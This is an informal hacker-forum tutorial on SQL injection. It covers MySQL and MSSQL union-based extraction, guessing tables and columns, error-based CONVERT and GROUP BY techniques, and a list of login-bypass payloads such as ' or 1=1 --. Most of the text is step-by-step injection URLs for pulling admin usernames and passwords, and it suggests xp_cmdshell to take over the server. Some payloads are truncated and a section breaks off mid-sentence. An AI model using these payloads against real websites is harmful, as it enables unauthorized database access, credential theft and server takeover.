Professional Documents
Culture Documents
################################################################################
?###########
Let's start with Mysql:
Mysql has 2 types only as mentioned above.you need to know the following things
about the DB you are attacking# Number of columns
# Table names
# column names
# Let's start with union Attack, the most common, every n00b should no it :p=> http://test.com/index.php?id=1 order by 10-^ This gives me an error
Let's again try
=> http://test.com/index.php?id=1 order by 7-^ This gives me an error
Let's try again
=> http://test.com/index.php?id=1 order by 5-Whoa !! the page is Loading normally
It means, Number of columns => 5
you can do it with mssql as well.
# Now the next partI'm using union select statement.
=> http://test.com/index.php?id=1 union all select 1,2,3,4,5-If it doesn't gives you anything, change the first part of the query to a negati
ve value.
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5-It'll show some number on you screen. In my case it is 2. Now we know that colum
n 2 will echo data back to us. :D
# getting Mysql version
=> http://test.com/index.php?id=-1 union all select 1,@@version,3,4,5-If you do not get with this try this=> http://test.com/index.php?id=-1 union select 1,version()),3,4,5-Now you will get get the version name
it can be# 5+
# 5>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
user_name
user_password
sex
uid
We only need to know username & pass so we reject the rest two. Okay ? :D
The next query will be for extracting the final data I need- :D
=> http://test.com/index.php?id=-1 union all select 1,group_concat(user_name,0x3
a,user_password),3,4,5 from admin-where 0x3a is the hex value of => :
VOILA !
I got the username & pass, it is => shubham:password
password can also be encrypted. So you can use few online decrypters or a softwa
re I know => Password Pro
This was all for Mysql 5+
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Let's Start with mysql 5>
Version 4 or below 5 does not contain any => Information_schema
so you have to guess them, Like people guess while playing KBC (who want to be a
millionaire)
hahaha :D
we know the number of columns that is 5.
=> Let's Start guessing the table:
=> http://test.com/index.php?id=-1 union all select 1,2,3,4,5 from users-^ This one gives me error
=> => http://test.com/index.php?id=-1 union all select 1,2,3,4,5 from Admin-^ Voila I guessed the right, you must be thinking ShubhaM is a Genious xD :p
=> Next part is Guessing the columns:
as we had done earlier & had found the vulnerable column is 2...so lets process
further.
guess something similar to a username.
=> http://test.com/index.php?id=-1 union all select 1,user,3,4,5 from admin-^ got error. Retrying...
=> http://test.com/index.php?id=-1 union all select 1,username,3,4,5 from adminHurray ! It gotta work baby & I got the username :D...!
=> let's guess the password column now
=> http://test.com/index.php?id=-1 union all select 1,pass,3,4,5 from admin-^ got an error
one more try=> http://test.com/index.php?id=-1 union all select 1,password,3,4,5 from adminhahaha...got the pass !!!
This is the end of Mysql 5> union.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
?XXXXXXXXXXXXXXXXXX
# Mysql BlindMost fu*king part. I really hate this. :X :P :X
Q. what is Blind Sql Injection ?
A. Blind SQL Injection is used when a web application is vulnerable to an SQL in
jection but the results of the injection are not visible to the attacker. The pa
ge with the vulnerability may not be one that displays data but will display dif
ferently depending on the results of a logical statement injected into the legit
imate SQL statement called for that page. This type of attack can become time-in
tensive because a new statement must be crafted for each bit recovered. There ar
e several tools that can automate these attacks once the location of the vulnera
Hope you know how to test sqli vulnerablity, So I'm leaving that part.
# Bypassing Authenctication- common for n00bs:
+--+
| ' or 1=1 -- |
| a' or 1=1 -- |
| " or 1=1 -- |
| a" or 1=1 -- |
| ' or 1=1 # |
| " or 1=1 # |
| or 1=1 -- |
| ' or 'x'='x |
| " or "x"="x |
| ') or ('x'='x |
| ") or ("x"="x |
| ' or username LIKE '%admin% |
+--+
| USERNAME: ' or 1/* |
| PASSWORD: */ =1 -- |
+--+
| USERNAME: admin' or 'a'='a |
| PASSWORD: '# |
+--+
=> Mssql Injection with Union Attacl:
I love Union <3
I've this site to test upon my power => http://test.com/news.asp?id=1
Ok, Let's Start# First find out the number of columns, counting one by one is boaring :P so I'l
l use "Hit & Trial Method", that I had learnt somewhere in Maths :D
ok. => http://test.com/news.asp?id=1 order by 6-We'll hit, until we get a error like this one[error] Microsoft SQL Native Client error '80040e14'
The ORDER BY position number 5 is out of range of the number of items in the sel
ect list.
/showthread.asp, line 9
[/error]
again trying to hit,
=> http://test.com/news.asp?id=1 order by 4-whoa !! worked :D
# Now I'll use union again=> http://test.com/news.asp?id=1 and 1=2 union select 11,22,33,44-# We will see "11" or "22" or "33" or "44" appeared on some point in returned pa
ge.
WOW ! i found 44 on my laptop's screen, so i'll replace 44 with @@version
=> http://test.com/news.asp?id=1 and 1=2 union select 11,22,33,@@version-^ So, this gives me the version Information.
Let's continue in grabbing the rest data, I'm using information_schema, as like
we did in Mysql :P
I think concat do not works in mssql, never tried also, if working also, I don't
know how to ! :P coz I'm just a 10th std student. No idea abt sql :P
So the next,
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from i
nformation_schema.tables-^ this gives me the name of first table, i.e => threads
I'll use the first table to get the next one & so on...untill u get what u want
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from i
nformation_schema.tables where table_name not in ('threads')-^ This gives me the name of the next table, i.e.=> users :D
Users is the required table for me which contains the info I need :D
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from
information_schema.columns where table_name='users'-^ this gives me the column name,i.e,uname. as we did to find the tables. same we
'll do with columns. Ok? :)
=> http://test.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from
information_schema.columns where table_name='users' and
column_name not in ('uname')-^ this gives me the next column,i.e, upass :D
Lolz, now I need data from these two columns :D
=> http://site.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users^ same with upass
this time my uname is admin. so to find next row, we do
=> http://site.com/news.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users
where uname not in ('admin')-further as well, we can extract the rest of the data. hope you understood this m
uch !!
Now next part is mssql blind :D
==
# Mssql blind :
# testing-
the select list because it is not contained in an aggreate function and there is
no GROUP BY clause.
[/error]
it shows second column of first table is news_author :D
third column can be obtained using the 2nd one
=> http://test.com/news.asp?id=1 GROUP BY news.news_id,news.news_author HAVING 1
=1-[error]
Microsoft OLE DB Provider for SQL Server error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'news.news_detail' is inva
lid in
the select list because it is not contained in an aggreate function and there is
no GROUP BY clause.
[/error]
third column is => news_detail
and so on...
Now,
## ODBC Error Message Attack with "CONVERT"here I'll show you how to grab, MSSQL_Version, DB_name, User_name.
=> http://test.com/news.asp?id=1+and+1=conv...version)-[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005
- 9.00.3042.00 (Intel X86) Feb 9 2007
22:47:07 Copyright 1988-2005 Microsoft Corporation Express Edition on Windows NT
5.2 (Build 3790: Service Pack 1)
' to data type int.
/page.asp, line 9
[/error]
therefore I know => the version of MSSQL and OS (Windows 2003 Server)
other things u can grab by replacing @@version with# db_name()
# user_name()
if in the user name it gives => Sa
it means you can use Xp_cmdshell, that will I'll tell u later, to enable rdp i.e
. remote desktop & hack the whole box :P :D
# Obtaining tables=> http://site.com/news.asp?id=1+and+1=conv...tables))-Result is threads, so
Next one,
=> http://test.com/news.asp?id=1+and+1=conv...able_name+
not+in+('threads')))-& so now...you can continue further now.
Next table for me is users that i founded using the threads one..! So now i need
columns from the table threads, Okay ? :)
# Finding columns
=> http://test.com/news.asp?id=1+and+1=conv...users'))-[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'uname' to data type int.
/showthread.asp, line 9
[/error]
First column is Uname ;)
So I continue
=> http://test.com/news.asp?id=1+and+1=conv...e='users'+
and+column_name+not+in+('uname')))-^ as we had done earlier :D
[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'upass' to data type int.
/showthread.asp, line 9
[/error]
For getting more column names,
we only append a known table list like that in getting table names.
# extracting data
=> http://test.com/news.asp?id=1+and+1=conv...+users))-[error]
Microsoft SQL Native Client error '80040e07'
Conversion failed when converting the nvarchar value 'admin' to data type int.
/page.asp, line 9
[/error]
same with upass ;)
Rest you are now on your own In mssql ;)
I'm leaving it here....it is much of done !!! now the thing left is that to use
your brain. ;)
# Soap InjectionLeaving this part :P I'll later make a paper on it ;)
end of MSsql ... :P
# Xp_cmdshell
I'd recommend to use some automated tools, I'm not in mood of writing on xp_cmds
hell, though it consists of simple cmd commands to activate rdp & using net user
Hackforums.net
Hackersbay.in
Academyofhacking.com
Indishell.in
packetstormsecurity.org
##
Greetz To###
greetz- C00lt04d,Cyb3rgr00f,Reb0rn,c0d3br34k3r,3thicaln00b,Cyb3rS4m,g00gl3 w4rri
0r & All my friends at AOH & Indishell.
special thanks- H4ck0lic, Bad Man :)
##3
End of this paper